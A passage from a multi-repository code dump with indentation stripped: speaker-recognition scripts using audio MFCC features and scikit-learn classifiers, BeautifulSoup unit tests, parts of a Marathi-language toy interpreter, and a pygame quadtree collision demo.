from sklearn.mixture import gaussian_mixture
my_dir = ['A','B','C','D']
my_file = ['1.wav','2.wav','3.wav','4.wav','5.wav','6.wav','7.wav','8.wav','9.wav','10.wav','11.wav','12.wav','13.wav','14.wav','15.wav','16.wav']
def init_data(x):
A = np.zeros(shape=(x, 1))
B = np.zeros(shape=(x, 1))
C = np.zeros(shape=(x, 1))
D = np.zeros(shape=(x, 1))
return A, B, C, D
A = np.zeros(shape=(13, 1))
B = np.zeros(shape=(13, 1))
C = np.zeros(shape=(13, 1))
D = np.zeros(shape=(13, 1))
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/A/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
A = np.hstack((A, f))
A = A[:, 1:].T
print(A.shape)
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/B/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
B = np.hstack((B, f))
B = B[:, 1:].T
print(B.shape)
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/C/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
C = np.hstack((C, f))
C = C[:, 1:].T
print(C.shape)
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/D/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
D = np.hstack((D, f))
D = D[:, 1:].T
print(D.shape)
A = A[:1000, ]
# np.savetxt('test01.csv', A, delimiter=',')
B = B[:1000, ]
C = C[:1000, ]
D = D[:1000, ]
# Take the first 1000 rows to prepare for the first shuffle
shuffle_index_step1 = np.random.permutation(1000)
A = A[shuffle_index_step1]
B = B[shuffle_index_step1]
C = C[shuffle_index_step1]
D = D[shuffle_index_step1]
# REST = np.vstack((B,C,D))
# Then take the first n_learn shuffled rows for training
n_learn = 650
A = A[:n_learn, ]
# REST = REST[:1950, ]
B = B[:n_learn, ]
C = C[:n_learn, ]
D = D[:n_learn, ]
data_set = np.vstack((A,B,C,D))
data = np.mat(data_set)
A_y = np.empty(n_learn, dtype=int)
A_y = np.full(A_y.shape, 1)
B_y = np.empty(n_learn, dtype=int)
B_y = np.full(B_y.shape, 2)
C_y = np.empty(n_learn, dtype=int)
C_y = np.full(C_y.shape, 3)
D_y = np.empty(n_learn, dtype=int)
D_y = np.full(D_y.shape, 4)
label_set = np.hstack((A_y,B_y,C_y,D_y))
label = np.array(label_set)
clf = gaussian_mixture.GaussianMixture(n_components=4, covariance_type='full')
clf.fit(data, label)
# Prediction
my_fflile = ['1.wav','2.wav','3.wav','4.wav']
for mydir in my_dir:
print(mydir + '\n')
for myfile in my_fflile:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/test/" +
mydir + "/" + myfile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ].T
result = clf.predict(f)
counter = f.shape[0]
counter1 = counter2 = counter3 = counter4 = 0
for i in range(0, counter):
if result[i] == 1:
counter1 += 1
if result[i] == 2:
counter2 += 1
if result[i] == 3:
counter3 += 1
if result[i] == 4:
counter4 += 1
print(counter1, ',', counter2, ',', counter3, ',', counter4, '\n')
```
#### File: Test Code/speak_reg/one_user_rec.py
```python
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
import matplotlib.pyplot as plt
import numpy as np
from sklearn import mixture
from sklearn import svm
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from sklearn.mixture import GaussianMixture
import os
RATE = float(0.75)
# Feature extraction
my_file = ['1.wav', '2.wav', '3.wav', '4.wav', '5.wav', '6.wav', '7.wav', '8.wav']
person = '12'
data_matrix = []
label_matrix = []
for file in my_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/train/" + person + '/' + file)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
f = f.T
data_matrix.append(f)
label = np.empty(f.shape[0], dtype=int)
label = np.full(label.shape, int(person))
label_matrix.append(label)
data_matrix = np.concatenate(data_matrix, 0)
label_matrix = np.concatenate(label_matrix, 0)
print(data_matrix.shape)
print(label_matrix.shape)
# clf_svm = svm.SVC(gamma='scale', decision_function_shape='ovo')
# clf_svm.fit(data_matrix, label_matrix)
gmm = GaussianMixture(n_components=1, covariance_type='full')
gmm.fit(data_matrix, label_matrix)
def max_list(lt):
temp = 0
for i in lt:
if lt.count(i) > temp:
max_str = i
temp = lt.count(i)
return str(max_str)
# lt->list, lb->label
def calculate_rate(lt, total, lb):
counter = 0
for item in lt:
if item == lb:
counter += 1
return float(counter / total)
# Prediction
pre_dir = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',
'20', '21', '22']
pre_file = ['1.wav', '2.wav']
# result_str = ''
for p_dir in pre_dir:
print(p_dir + ': '),
for p_file in pre_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/test/" + p_dir + '/' + p_file)
F = audioFeatureExtraction.stFeatureExtraction(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ].T
result = gmm.predict(f)
# if calculate_rate(result.tolist(), float(result.shape[0]), p_dir) >= RATE:
# print('Yes '),
# else:
# print('No'),
print(result)
```
#### File: Test Code/speak_reg/speak_reg02.py
```python
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
import numpy as np
from sklearn.mixture import GaussianMixture
from sklearn.ensemble import RandomForestClassifier
my_dir = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',
'20', '21', '22']
my_file = ['1.wav','2.wav','3.wav','4.wav','5.wav','6.wav','7.wav','8.wav']
data_matrix = []
label_matrix = []
n = 0
n = int(n)
for f_dir in my_dir:
n += 1
for f_file in my_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/train/" + f_dir + "/" + f_file)
F = audioFeatureExtraction.stFeatureExtraction(x, Fs, 256, 80)
f = F[8:21, ]
f = f.T
data_matrix.append(f)
label = np.empty(f.shape[0], dtype=int)
label = np.full(label.shape, n)
label_matrix.append(label)
data_matrix = np.concatenate(data_matrix, 0)
label_matrix = np.concatenate(label_matrix, 0)
print(data_matrix.shape)
print(label_matrix.shape)
# gmm = GaussianMixture(n_components=4, covariance_type='full')
# gmm.fit(data_matrix, label_matrix)
rfc = RandomForestClassifier(n_estimators=200, max_depth=4, random_state=0)
rfc.fit(data_matrix, label_matrix)
# Prediction
def max_list(lt):
temp = 0
for i in lt:
if lt.count(i) > temp:
max_str = i
temp = lt.count(i)
return str(max_str)
pre_dir = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',
'20', '21', '22']
pre_file = ['1.wav', '2.wav']
counter = current = 0
result_matrix = []
for p_dir in pre_dir:
# current += 1
result_matrix.append(p_dir)
result_matrix.append(':')
for p_file in pre_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/test/" + p_dir + '/' + p_file)
F = audioFeatureExtraction.stFeatureExtraction(x, Fs, 256, 80)
f = F[8:21, ].T
result = rfc.predict(f)
result_in = result.tolist()
result_matrix.append(max_list(result_in))
print(result_matrix)
```
#### File: Test Code/speak_reg/test03.py
```python
import numpy as np
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
from sklearn import svm
from os import listdir
from random import sample
def load_from_other_csvs_refreshed(file_dir, current_filename, tag):
"""
:param file_dir: directory holding the csv files of MFCC features
:param current_filename: csv filename of the current user's MFCC features
:param tag: label value assigned to the other users' data (0)
:return: the MFCC feature matrix of the other users and the matching label list
"""
all_files = listdir(file_dir) # store all filenames in a list
all_files = sample(all_files, 16) # randomly pick 16 filenames
if current_filename in all_files:
all_files.remove(current_filename) # if the current user's mfcc file is in the list, remove it
else:
del all_files[-1] # otherwise drop the last filename, so only other users' mfcc files remain
mfccs_matrix = []
label_matrix = []
for file in all_files:
mfccs = np.loadtxt(file_dir + '/' + file, delimiter=',') # load the csv file
mfccs_matrix.append(mfccs)
label = np.empty(mfccs.shape[0], dtype=int)
label = np.full(label.shape, int(tag))
label_matrix.append(label)
mfccs_matrix = np.concatenate(mfccs_matrix, 0)
label_matrix = np.concatenate(label_matrix, 0)
# Finally the rows could be shuffled so that every user's data is mixed together
# mfccs_matrix = np.random.permutation(mfccs_matrix)
print(mfccs_matrix.shape, label_matrix.shape)
return mfccs_matrix, label_matrix
def mfcc_auth(data_matrix, label_matrix, predict_matrix):
clf_svm = svm.SVC(gamma='scale', decision_function_shape='ovo')
clf_svm.fit(data_matrix, label_matrix)
result = clf_svm.predict(predict_matrix).tolist()
print(result)
counter = 0
for each in result:
if each == 1:
counter += 1
percentage = counter / len(result)
print(percentage)
if percentage >= 0.50:
return True
else:
return False
def load_mfccs_from_csv(csv_path, tag):
mfccs = np.loadtxt(csv_path, delimiter=',')
label = np.empty(mfccs.shape[0], dtype=int)
label = np.full(label.shape, tag)
return mfccs, label
def extract_mfcc_not_threading(audio_path):
[Fs, x] = audioBasicIO.readAudioFile(audio_path)
F = audioFeatureExtraction.stFeatureExtraction_modified_2nd_edition(x, Fs, 256, 80)
mfccs = F.T
return mfccs
test_data = extract_mfcc_not_threading('D:/AudioProcessing/test.wav') # test data
train_data_1 = extract_mfcc_not_threading('D:/AudioProcessing/train.wav') # training data
label_1 = np.empty(train_data_1.shape[0], dtype=int)
label_1 = np.full(label_1.shape, 1)
``` |
{
"source": "joexu22/BamaWebScraper",
"score": 3
} |
#### File: BeautifulSoupCode/test/test_scraping_3.py
```python
import unittest
from bs4 import BeautifulSoup
from pathlib import Path
class TestBeautifulSoup(unittest.TestCase):
def test_find(self):
path = Path(__file__).parent / "../html_folder/ecological_pyramid.html"
with open(path) as ecological_pyramid:
soup = BeautifulSoup(ecological_pyramid, 'html.parser')
# finding the first item in an "unordered list"
producer_entries = soup.find('ul')
self.assertEqual(str(producer_entries.li.div.string), 'plants')
# find() method in BeautifulSoup
# find(name,attrs,recursive,text,**kwargs)
# finding soup.find(name = "li")
tag_li = soup.find("li")
self.assertEqual(str(type(tag_li)), "<class 'bs4.element.Tag'>")
# searching for text in soup object
search_for_stringonly = soup.find(text="fox")
self.assertEqual(str(search_for_stringonly), 'fox')
# note about being case sensitive
case_sensitive_string = soup.find(text="Fox")
# will return None
self.assertEqual(case_sensitive_string, None)
self.assertNotEqual(str(case_sensitive_string), 'Fox')
if __name__ == '__main__':
unittest.main()
```
#### File: BeautifulSoupCode/test/test_scraping_5.py
```python
import unittest
from bs4 import BeautifulSoup
from pathlib import Path
class TestBeautifulSoup(unittest.TestCase):
def test_soup_functions(self):
path = Path(__file__).parent / "../html_folder/ecological_pyramid.html"
with open(path) as ecological_pyramid:
soup = BeautifulSoup(ecological_pyramid, 'html.parser')
# finding the first "primary consumer" in the list
primary_consumers = soup.find(id="primaryconsumers")
self.assertEqual(str(primary_consumers.li.div.string), 'deer')
# using functions with soup
# the function does not seem to need any parameters passed to it
def is_secondary_consumer(tag):
return tag.has_attr('id') and tag.get('id') == 'secondaryconsumers'
secondary_consumer = soup.find(is_secondary_consumer)
#print(type(secondary_consumer))
self.assertEqual(str(secondary_consumer.li.div.string), 'fox')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joey00072/Marathi-Programing-Language",
"score": 3
} |
#### File: Marathi-Programing-Language/Errors/base_error.py
```python
class Error:
def __init__(self, error_name, pos_start, pos_end, details):
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f"{self.error_name} : {self.details} \n"
result += f"File {self.pos_start.fn}, line {self.pos_start.ln+1}"
result += "\n\n" + self.string_with_arrows(
self.pos_start.ftxt, self.pos_start, self.pos_end
)
return result
def string_with_arrows(self, text, pos_start, pos_end):
result = ""
# Calculate indices
idx_start = max(text.rfind("\n", 0, pos_start.idx), 0)
idx_end = text.find("\n", idx_start + 1)
if idx_end < 0:
idx_end = len(text)
# Generate each line
line_count = pos_end.ln - pos_start.ln + 1
for i in range(line_count):
# Calculate line columns
line = text[idx_start:idx_end]
col_start = pos_start.col if i == 0 else 0
col_end = pos_end.col if i == line_count - 1 else len(line) - 1
# Append to result
result += line + "\n"
result += " " * col_start + "^" * (col_end - col_start)
# Re-calculate indices
idx_start = idx_end
idx_end = text.find("\n", idx_start + 1)
if idx_end < 0:
idx_end = len(text)
return result.replace("\t", "")
```
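The `string_with_arrows` helper underlines the offending span of a source line with `^` characters. A quick sketch of the intended output, using a minimal stand-in for the position objects (the real `Position` class lives elsewhere in this repo; only the `idx`, `ln`, `col`, `fn` and `ftxt` attributes read above are assumed, and the snippet is expected to run from the repo root):
```python
from collections import namedtuple

from Errors.base_error import Error

# Stand-in exposing only the attributes base_error.py actually reads.
Position = namedtuple('Position', 'idx ln col fn ftxt')

text = "x = 10 @ 2"
start = Position(idx=7, ln=0, col=7, fn='<stdin>', ftxt=text)
end = Position(idx=8, ln=0, col=8, fn='<stdin>', ftxt=text)

print(Error("IllegalCharacter", start, end, "'@'").as_string())
# The final lines of the output point at the '@':
# x = 10 @ 2
#        ^
```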
#### File: Marathi-Programing-Language/Errors/errors.py
```python
from Errors.base_error import Error
class IllegalCharacterError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(
"चुकीचे अक्षर (Illegal Character)", pos_start, pos_end, details
)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__("अवैध वाक्यरचना (InvalidSyntax)", pos_start, pos_end, details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__("अपेक्षित अक्षर (Expected Character)", pos_start, pos_end, details)
class RTError(Error):
def __init__(self, pos_start, pos_end, details, context):
super().__init__("प्रोग्राम चालू असताना त्रुटी आली (Runtime Error)", pos_start, pos_end, details)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f"{self.error_name}: {self.details}"
result += "\n\n" + self.string_with_arrows(
self.pos_start.ftxt, self.pos_start, self.pos_end
)
return result
def generate_traceback(self):
result = ""
pos = self.pos_start
ctx = self.context
while ctx:
result = (
f" File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n"
+ result
)
pos = ctx.parent_entry_pos
ctx = ctx.parent
return "त्रुटी मागोवा (Traceback (most recent call last)):\n" + result
```
#### File: joey00072/Marathi-Programing-Language/main.py
```python
from Lexer import Lexer
from Parser import Parser
from Interpreter import Interpreter
from Context import Context
from SymbolTable import global_symbol_table
import sys
#------------EXECUTE--------------
# ------------RUN-----------------
context =None
def run(fn, text, debug=False):
global context
lexer = Lexer(fn, text)
# Generate Tokens
tokens, error = lexer.make_tokens()
if error:
return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if debug:
print("---symbols--\n")
print(global_symbol_table.symbols, "\n")
print("---tokens--\n")
print(tokens, "\n")
print("--AST--\n")
print(ast.node, "\n")
print("--output--\n")
if ast.error:
return None, ast.error
# Run program
interpreter = Interpreter()
context = Context("<program>")
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
def run_from_file(file_name):
splits = file_name.strip().split(".")
if len(splits)<2:
print("Invalid argument")
name = "".join(splits[:-1])
extension = splits[-1].lower()
if extension!='baji':
print("File extension should .baji")
print(f"Found -> {extension}")
exit()
try:
with open(file_name , 'r',encoding='utf-8') as f:
script = f.read()
except BaseException as e:
print("Failed to load Script")
print(str(e))
_,error = run(f"<{name}>", script, debug=False)
if error:
print(error.as_string())
if __name__=="__main__":
args = sys.argv
if len(args)>1:
run_from_file(args[1])
else:
print("Provide file name")
```
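Since `run` wires the full pipeline together (lexer → tokens → parser → AST → interpreter), calling it directly is enough for a quick REPL-style check. A hedged sketch, assuming plain arithmetic is accepted by the Lexer and the snippet is launched from the repo root:
```python
from main import run

value, error = run('<stdin>', '2 + 3 * 4', debug=True)
if error:
    print(error.as_string())
else:
    print(value)  # expected: the Marathi rendering of 14
```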
#### File: Marathi-Programing-Language/values/number.py
```python
from Values.value import Value
from Errors import RTError
from Translate import Translate
#------------Values-----------------
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
self.translate = Translate()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
div = self.value / other.value
#👇 convert float -> int when the result is a whole number
div = int(div) if int(div)==div else div
return Number(div).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def moded_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Mod by zero',
self.context
)
div = self.value % other.value
#👇 convert float -> int when the result is a whole number
div = int(div) if int(div)==div else div
return Number(div).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def power_by(self,other):
if isinstance(other,Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.translate.number_to_mar(self.value))
Number.null = Number(0)
Number.false = Number(0)
Number.true = Number(1)
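# A quick illustration of the (result, error) convention used by the
# arithmetic methods above (comments only; assumes the Value/Translate
# helpers import cleanly):
#
#     a, b = Number(10), Number(0)
#     total, err = a.added_to(b)     # -> (Number(10), None)
#     quotient, err = a.dived_by(b)  # -> (None, RTError: 'Division by zero')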
``` |
{
"source": "joey00072/Quadtree-in-python",
"score": 3
} |
#### File: joey00072/Quadtree-in-python/quadtree.py
```python
import pygame
from math import sin,cos,pi
import math
from pygame.draw import line,circle,rect
from pygame.gfxdraw import aacircle
from pygame import gfxdraw
import random
import time
import numpy as np
import sys
sys.setrecursionlimit(10000)
# random.seed(0)
pygame.init()
HIGHT,WIDTH= 600,600
BLACK=(0,0,0)
WHITE=(255,255,255)
BLUE=(0,0,255)
GRAY=(120,120,120)
DARKGRAY = (10,10,10)
GREEN = (0,250,0)
RED=(255,0,0)
PointRadius=3
CAPACITY = 5
ox,oy = WIDTH//2,HIGHT//2
screen = pygame.display.set_mode((WIDTH,HIGHT))
clock = pygame.time.Clock()
font = pygame.font.SysFont('Comic Sans MS', 30)
class QuadTree(object):
"""docstring for QuadTree"""
def __init__(self, START=(0,0),capacity=5,HIGHT=HIGHT,WIDTH=WIDTH,depth=0,name="ROOT"):
super(QuadTree, self).__init__()
# print(HIGHT,WIDTH,depth,name)
self.Points = []
self.capacity = capacity
self.childern = False
self.START = START
self.NW = None
self.NE = None
self.SW = None
self.SE = None
self.depth = depth
self.name = name
self.HIGHT = HIGHT
self.WIDTH = WIDTH
# print(f"START:{START} {self.name} ")
def divide(self):
# print(len(self.Points))
# if len(self.name)>1000:
# self.capacity=30
self.NW = QuadTree((self.START[0] ,self.START[1] ), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-NW")
self.NE = QuadTree((self.START[0]+self.WIDTH//2 ,self.START[1] ), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-NE")
self.SW = QuadTree((self.START[0] ,self.START[1]+self.HIGHT//2), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-SW")
self.SE = QuadTree((self.START[0]+self.WIDTH//2 ,self.START[1]+self.HIGHT//2), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-SE")
def insert(self,Point):
if not self.childern:
if len(self.Points)< self.capacity:
self.Points.append(Point)
else:
self.Points.append(Point)
self.childern = True
self.divide()
x,y=self.START
for point in self.Points:
# print(f"point: {point.x} , {point.y}")
if (point.x<=x+self.WIDTH//2 and point.y<=y+self.HIGHT//2):
self.NW.insert(point)
elif (point.y<=y+self.HIGHT//2):
self.NE.insert(point)
elif (point.x<=x+self.WIDTH//2):
self.SW.insert(point)
else:
self.SE.insert(point)
else:
self.Points.append(Point)
point=Point
x,y=self.START
if (point.x<=x+self.WIDTH//2 and point.y<=y+self.HIGHT//2):
self.NW.insert(point)
elif (point.y<=y+self.HIGHT//2):
self.NE.insert(point)
elif (point.x<=x+self.WIDTH//2):
self.SW.insert(point)
else:
self.SE.insert(point)
def query(self,box):
cnt=0
START_x,START_y,END_x,END_y=box
self.x,self.y=self.START
if self.x>=START_x and self.y>=START_y and self.x+self.WIDTH<=END_x and self.y+self.HIGHT<=END_y :
return len(self.Points)
if self.x>END_x or self.y>END_y or self.x+self.WIDTH<START_x or self.y+self.HIGHT<START_y :
return 0
if self.childern:
cnt+=self.NW.query(box)
cnt+=self.NE.query(box)
cnt+=self.SW.query(box)
cnt+=self.SE.query(box)
else:
for point in self.Points:
if point.x>=START_x and point.y>=START_y and point.x<=END_x and point.y<=END_y:
cnt+=1
# print(self.name,cnt)
return cnt
def getPointInRange(self,box):
cnt=[]
START_x,START_y,END_x,END_y=box
self.x,self.y=self.START
if self.x>=START_x and self.y>=START_y and self.x+self.WIDTH<=END_x and self.y+self.HIGHT<=END_y :
# print("HDHH")
return self.Points
if self.x>END_x or self.y>END_y or self.x+self.WIDTH<START_x or self.y+self.HIGHT<START_y :
EMPTY=[]
# print(type(EMPTY),"EMPTY")
return EMPTY
if self.childern:
# print(type(cnt),type(self.NW.query(box)) , self.NW.query(box))
cnt=cnt+self.NW.getPointInRange(box)
cnt=cnt+self.NE.getPointInRange(box)
cnt=cnt+self.SW.getPointInRange(box)
cnt=cnt+self.SE.getPointInRange(box)
else:
for point in self.Points:
if point.x>=START_x and point.y>=START_y and point.x<=END_x and point.y<=END_y:
cnt.append(point)
# print(self.name,len(cnt))
# print("74HDHH")
return cnt
def draw(self,deplth=0):
# print(deplth)
if self.childern:
x,y = self.START
line(screen,GRAY,(x,y+(self.HIGHT//2)) , (x+(self.WIDTH),y+(self.HIGHT//2)),1)
line(screen,GRAY,(x+(self.WIDTH//2),y) , (x+(self.WIDTH//2) ,y+(self.HIGHT)),1)
self.NW.draw(deplth+1)
self.NE.draw(deplth+1)
self.SW.draw(deplth+1)
self.SE.draw(deplth+1)
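# A minimal usage sketch of the tree on its own (comments only; insert/query
# need no pygame surface, and the coordinates below are made up):
#
#     tree = QuadTree(capacity=4)
#     for x, y in [(50, 50), (75, 80), (300, 300), (310, 320), (500, 100)]:
#         tree.insert(Point(x, y))
#     tree.query((0, 0, 200, 200))                  # -> 2 points in the box
#     len(tree.getPointInRange((0, 0, 200, 200)))   # -> 2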
ox,oy = WIDTH//2,HIGHT//2
class Point(object):
"""docstring for Points"""
def __init__(self, x=None,y=None,vx=0,vy=0,mass=1):
super(Point, self).__init__()
self.x = x if x else random.randint(10,WIDTH-12)
self.y = y if y else random.randint(10,WIDTH-12)
self.vx = vx
self.vy = vy
self.mass = mass
self.intersect=False
def display(self,Color=None):
# circle(screen, WHITE if self.intersect else GRAY ,(int(self.x),int(self.y)),PointRadius)
aacircle(screen,int(self.x),int(self.y),PointRadius,WHITE if self.intersect else GRAY )
gfxdraw.filled_circle(screen,int(self.x),int(self.y),PointRadius,WHITE if self.intersect else GRAY )
def randomWalk(self):
global ox,oy
self.x += random.randint(-10,10)/3
self.y += random.randint(-10,10)/3
# dist=self.dist((ox,oy),(self.x,self.y))+5
# self.x += (ox-self.x)/dist
# self.y += (oy-self.y)/dist
# ox,oy = WIDTH//2,HIGHT//2
# ox+=100
# oy+=100
# print(ox,oy)
# self.x -= (self.x-ox ) *0.001
# self.y -= (self.y-oy ) *0.001
# dx=self.dist((ox,oy),(self.x,self.y))
# if self.x<WIDTH//2:
# self.x+=dx*0.001
# else:
# self.x-=dx*0.001
# if self.y<WIDTH//2:
# self.y+=dx*0.001
# else:
# self.y-=dx*0.001
def move(self):
self.x +=self.vx
self.y +=self.vy
def dist(self,p1,p2):
p1x,p1y=p1
p2x,p2y=p2
return math.sqrt( (p2x-p1x)**2 + (p2y-p1y)**2 )
def getCoordinate(self):
return (self.x,self.y)
def setIntersect(self,isIntersect):
# print(isIntersect)
self.intersect = isIntersect
class Universe(object):
"""docstring for Universe"""
def __init__(self, no_of_points=10):
super(Universe, self).__init__()
self.no_of_points = no_of_points
self.allPoints = []
self.Tree = QuadTree(capacity=CAPACITY)
self.initUniverse()
self.g = 1000
def initUniverse(self):
for i in range(self.no_of_points):
point=Point()
self.allPoints.append(point)
self.Tree.insert(point)
for i in range(30):
point=Point(HIGHT//2+100+random.randint(-30,30),WIDTH//2+100+random.randint(-30,30))
self.allPoints.append(point)
self.Tree.insert(point)
for i in range(30):
point=Point(HIGHT//2-100+random.randint(-30,30),WIDTH//2-100+random.randint(-30,30))
self.allPoints.append(point)
self.Tree.insert(point)
def display(self):
for Point in self.allPoints:
Point.display()
Point.randomWalk()
self.Tree.draw()
def walk(self):
for Point in self.allPoints:
Point.move()
def dist(self,p1,p2):
return math.sqrt( (p2.x-p1.x)**2 + (p2.y-p1.y)**2 )
def isColiding(self,p1,p2):
if self.dist(p1,p2)<=PointRadius+10:
# print(PointRadius,self.dist(p1,p2))
return True
else:
return False
def collision(self):
for Point in self.allPoints:
Point.setIntersect(False)
# for i in range(len(self.allPoints)):
# for j in range(i,len(self.allPoints)):
# p1=self.allPoints[i]
# p2=self.allPoints[j]
# if not(p1.x==p2.x and p1.y==p2.y):
# if self.isColiding(p1,p2):
# p1.setIntersect(True)
# p2.setIntersect(True)
for p in self.allPoints:
x,y=p.x,p.y
SIDE=4*PointRadius
lst=U.Tree.getPointInRange((x-SIDE,y-SIDE,x+SIDE,y+SIDE))
for point in lst:
if not (point.x==p.x and point.y==p.y):
ans=self.isColiding(p,point)
p.setIntersect(ans)
if ans:
continue
def gForce(self,p1,p2):
return self.g * p1.mass * p2.mass/ (self.dist(p1,p2))**2
def findAngle(self,p1,p2):
d=self.dist(p1,p2)
x = p1.x -p2.x
y = p1.y -p2.y
return math.atan2(y,x)
def gravity(self):
for p1 in self.allPoints:
for p2 in self.allPoints:
if not (p1.x-p2.x<10 and p1.y-p2.y<10) :
v = self.gForce(p1,p2)/p1.mass
# print(v)
angle = self.findAngle(p1,p2)
# print(angle,"A")
p1.vx += -v*cos(angle)
p1.vy += -v*sin(angle)
def addPoint(self,pos):
x,y = pos
p = Point(x,y)
self.allPoints.append(p)
self.Tree.insert(p)
def update_fps():
fps = str(int(clock.get_fps()))
fps_text = font.render(fps, 1, pygame.Color("coral"))
return fps_text
def lightup(ROOT,vis):
if vis:
return Tree
if ROOT.childern:
if lightup(ROOT.NW,vis):
return True
if lightup(ROOT.NE,vis):
return True
if lightup(ROOT.SW,vis):
return True
if lightup(ROOT.SE,vis):
return True
# if not vis:
# if lightup(ROOT.NE,vis):
# return True
# if not vis:
# vis=lightup(ROOT.NW,vis)
# if not vis:
# vis=lightup(ROOT.SW,vis)
# if not vis:
# vis=lightup(ROOT.SE,vis)
else:
rt=False
for point in ROOT.Points:
if not point.intersect:
print(ROOT.name)
print(point.x,point.y)
point.intersect=True
rt=True
break
return rt
# return True
# def drawRect(ROOT):
# rect(screen,DARKGRAY,(ROOT.START[0],ROOT.START[1],ROOT.WIDTH,ROOT.HIGHT),1)
# if ROOT.childern:
# drawRect(ROOT.NW)
# drawRect(ROOT.NE)
